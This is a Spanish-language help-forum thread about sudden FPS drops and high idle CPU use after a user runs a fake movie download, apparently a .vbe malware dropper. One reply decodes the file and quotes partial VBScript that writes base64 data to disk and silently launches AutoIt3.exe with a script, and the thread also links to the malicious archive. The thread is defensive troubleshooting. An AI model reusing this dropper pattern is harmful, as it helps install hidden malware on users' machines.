Ayuda con bajones de fps y temperatura de CPU. (No es un hilo de novato, ayuda seria)

Muy buenas comunidad. Me he hecho una cuenta aquí ya que veo muchas veces este foro y me ayuda mucho, y espero poder ayudar también.
Hoy me ha surgido un problema, de repente, tanto Overwatch, como Player unknow battlegrounds, me dan bajones de fps. La cosa es que hasta ayer que jugué por la mañana todo me iba bien como siempre. Overwatch en épico (70 fps CONSTANTES), y player unknow pues con sus subidas y bajas, porque voy mas justo, pero nunca bajones de fps que no me permitan jugar, o me hagan jugar incomodo, es decir, dentro de lo que cabe bastante bien.

Gráfica Nvidia GTX 1060 3gb
Procesador AMD FX 9590 8 nucleos 4.00 GHz
Ram 16 gb
Windows 7 64x

Agradezco vuestra ayuda, pero no me sirve nada de actualiza drivers, analiza con CCleaner, formatea (que lo haré si no tengo salvación), etc... Ya he hecho todo eso, incluso analicé por si tenia virus, etc.
Aquí llega otro dilema, ayer por la noche sin haber jugado a nada, me bajé un torrent de una película (El corredor del laberinto: las pruebas. Desde mejortorrent.com, en HDrip) me lo detectaba el chrome como amenaza, supuse que era un error y lo bajé. Era torrent.reg o algo así, archivo de registro, intenté abrirlo y nada. No se si tendrá que ver, pero es sospechoso, pero Avast no me ha detectado nada.
Aquí otro dilema, el cuál pienso que es el problema principal, mi procesador esta a 65+- grados, simplemente navegando por internet, cosa que nunca ha hecho, siempre esta sobre 30 o 35 navegando, y jugando a 60 o así, lo tengo muy bien ventilado y organizado el circuito de aire por dentro. Cuando empiezo a jugar empieza bien 30 segundos y luego ya empiezan los fps a bajar, pero muy raro, no como un bajon de fps de gráfica, tiene pinta de bajón de fps de procesador la verdad, pero claro, no entiendo que puede estar pasando, algo esta corrompiendo, succionando o infectando mi procesador, y no doy con que puede ser.
Espero haberme explicado bien, y que podáis ayudarme. Muchísimas gracias de antemano. Un saludo.
Un archivo de registro REG es para agregar o quitar claves y variables al registro de windows. Si no sabes que es el registro y cual es su importancia NUNCA USES NADA QUE MODIFIQUE EL REGISTRO. Cuando tu 'intentas abrir' un archivo de extension REG estas indicandole a windows que modifique el registro, tu no veras nada y no debes ver nada porque es lo normal, pero ya agregaste o quitaste 'algo' en algun programa o en algun modulo de windows, como sea HAS HECHO ALGO AUNQUE NO VEAS 'NADA'.

Ejemplo de un archivo REG.

Disable_ZIP_Compressed_Folders.reg
Este lo han hecho para deshabilitar el manejo de archivos ZIP del explorador de archivos de windows. Yo o baje porque se que va a hacer, que es lo quie yo necesite en su momento y lo baje de un lugar de confianza. Pude hacer manualmente el cambuio desde el editor del registro dew windows, pero si ya lo han hecho para que con un par de cliocks se hagan los cambios, pues mejor.

Disable_ZIP_Compressed_Folders.reg escribió:Windows Registry Editor Version 5.00

; Created by: Shawn Brink
; http://www.sevenforums.com
; Tutorial: http://www.sevenforums.com/tutorials/13 ... -view.html


[-HKEY_CLASSES_ROOT\CompressedFolder\CLSID]

[-HKEY_CLASSES_ROOT\SystemFileAssociations\.zip\CLSID]





Si ha dado la entrada abriendo un puerto, pues igual ya tienes algun programa que esta usando mucho tiempo del procesador y con elloo aunque tu no estes haciendo 'nada' [en apariencia], en segundo palno y escondido se esta realizando alguna tarea.

Y con esto del procesador 'ocupado' haciendo 'quien sabe que' es que tenmdrias esos bajones, ya que un juego mal hecho y de juego en linea como el que mencionas exige mucho del prcesador.


Has esto:

Baja CORETEMP que es gratuito, abrelo y deja su ventana abnierta, como te daras cuenta muestra el procentaje de uso de cada nucleo del procesador. Cierra todos los programas, incluido antivirus, desconecta de internet. Deja unos minutos coretemp abierto y el porcentaje de uso a lo mucho seria del 4% en cada uno de los nucleos, asi que debera estar ioscilando entre 0% al 4%, si pasa de eso es que hay programas corriendo.


Como sea yo qyue tu pasaria mientras tanto MALWAREBYTES y DR WEB CURE It! para asegurarme de que no hay algun malware.

.
Puedes editar el archivo .REG y mirar que es lo que ha modificado pero como apunta el compañero, tiene pinta de que estén minando con tu equipo.
Gracias a todos por la ayuda, he pasado el Antimalware y ha detectado 433 amenazas, ya todas eliminadas. Voy a probar a cerrar todo y ver el porcentaje de los núcleos con CoreTemp. Mientras tanto, os dejo el enlace directo al ZIP donde bajé tal archivo. ¿Podría alguien examinarlo y decirme si es el origen de este problema? ¿O si no tiene nada que ver y simplemente ha sido casualidad? Gracias.

http://tumejortorrent.com/torrents/torr ... ip.torrent

(Segunda Edición mensaje)

He probado desconectar internet y todos los programas. Los núcleos se quedan en 0%, temperatura 29. En cambio, si reinicio y dejo el antivirus e internet conectado los cores están al 90%, 50% 70% oscilando por ahí. Pero de media entre 80% y 95%.

El archivo era formato ".vbe" no ".reg". Me confundí, igualmente sigo siendo de registro creo. No he probado los juegos ahora, pero me parece raro que aún habiendo analizado AntiMalware y tal, solo con el navegador web, antivirus y nada más mi CPU este a 50 grados. Nunca ha estado así, incluso jugando a Overwatch creo recordar que solo llegaba a 55, o un poco mas quizá.

Gracias por la ayuda.
@ivansuper23 Cuando una máquina hace algo raro de la noche a la mañana, sin alteración alguna de software o hardware, es que algún componente está a punto de cascar, de modo que me inclino a pensar que "algo" sí cambió.

Por otra parte, acabo de entrar en ésa página (la buena), pulsado sobre el enlace a la película, y todo es correcto: el fichero a descargar es "El corredor del laberinto Las pruebas (HDRip) (EliteTorrent.net).avi", de modo que ese archivo *.vbe (un archivo de VisualBasic encriptado) no ha salido de ahí.

Seguramente has puesto el nombre dde la película en el buscador y has pulsado en el primer enlace que te ha parecido bien.

Supongo que, como no eres novato, sabes que las extensiones para torrent son *.torrent o enlaces "magnet" reconocibles por llevar esa palabra en el encabezado.

Por último, te recomendaría que eliminases ese enlace a la de ya, que además sabes que puede ser malicioso.
Gracias amigo por la respuesta, claro que se la terminación torrent, era tarde y pensé que sería un error nada más. Bajó siempre de esa página y no entro por google, ni pincho el primer enlace, entro en la página y bajo la película que desee. Entrar a la página entro mi novia, y cuando no podía bajar el link fui yo a mirarlo. El enlace lo he puesto ahí, ábrelo y comprueba que no es torrent, es un zip con el archivo de registro dentro. Me he percatado que pone "tumejortorrent", quizá entro mi novia en un enlace erróneo, pero la página era mejortorrent.com claramente. Yo también comprobé el enlace esta mañana y estaba bien, y tuve que buscar el mismo de ayer en "Mis Descargas" de Chrome. Por lo tanto algo raro ha pasado. No me tomes como un novato por favor, necesito solucionar esto, y claro está agradezco toda vuestra ayuda! Mira el enlace si puedes, y comprueba el archivo. A lo mejor alguno sabéis, yo ahí ya no llego. Gracias de antemano.

(Dr Web CureIt tampoco me ha detectado nada malicioso)
@ivansuper23 He estado trasteando, pero yo de VB ni papa.

Eso sí, siempre mediante herramientas en línea.

Para desencriptar el archivo.

Para visualizar el contenido.

Resultará algo como:
ON ERROR RESUME NEXT
dim objShell, objFSO, objFileIn, objStreamIn, dataa,objXML,objDocElem,objStream,objFolder, appdatapath
Set objShell = CreateObject( "WScript.Shell" )

appdatapath = "C:\" & objShell.ExpandEnvironmentStrings( "%COMPUTERNAME%" )
Const foForReading = 1
Const foAsASCII = 0
Const adSaveCreateOverWrite = 2
Const adTypeBinary = 1

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("Base64Data")
objFSO.CreateFolder(appdatapath)
objDocElem.DataType = "bin.base64"
Set objStream = CreateObject("ADODB.Stream")

...etcétera...

...y terminará como
objFile.Close
Set objShell = CreateObject("Shell.Application")
objShell.ShellExecute appdatapath+"\AutoIt3.exe", "test.au3", appdatapath, "open", 0


Y aquí entraría alguien que sepa qué carajo es esto. [ginyo]
Estando implicado el "ADODB.Stream", que es para transmitr datos binarios, tiene toda la pinta de un script de minado, pero como digo, mejor que lo asegure alguien que domine el tema.
Al final he decidido formatear. Tengo particiones y no pierdo nada, solo dos o tres programas y juegos. No podía mas llevaba toda la mañana y la noche de ayer trasteando. Muchas gracias a todos por la ayuda aun así. Me incorporo al foro para participar en la ayuda. Un saludo.
Has hecho justo lo que venía a recomendarte. Formatear.

Tiene pinta que ha sido por eso, pero de todas formas si te sigue pasando ahora con todo limpio, pudiera ser que tu equipo se de esos que les ha afectado más los parches de seguridad de meltdown/spectre.

Pero repito, un .reg por la cara, mal asunto.
Igual te minan que te roban usuario y claves. Con todo limpio, cambia las claves tanto las almacenadas como las que hayas podido meter a mano desde entonces en algún sitio (si eran códigos de verificación en 2 pasos no importan).
Y no probaste a restaurar primero??
10 respuestas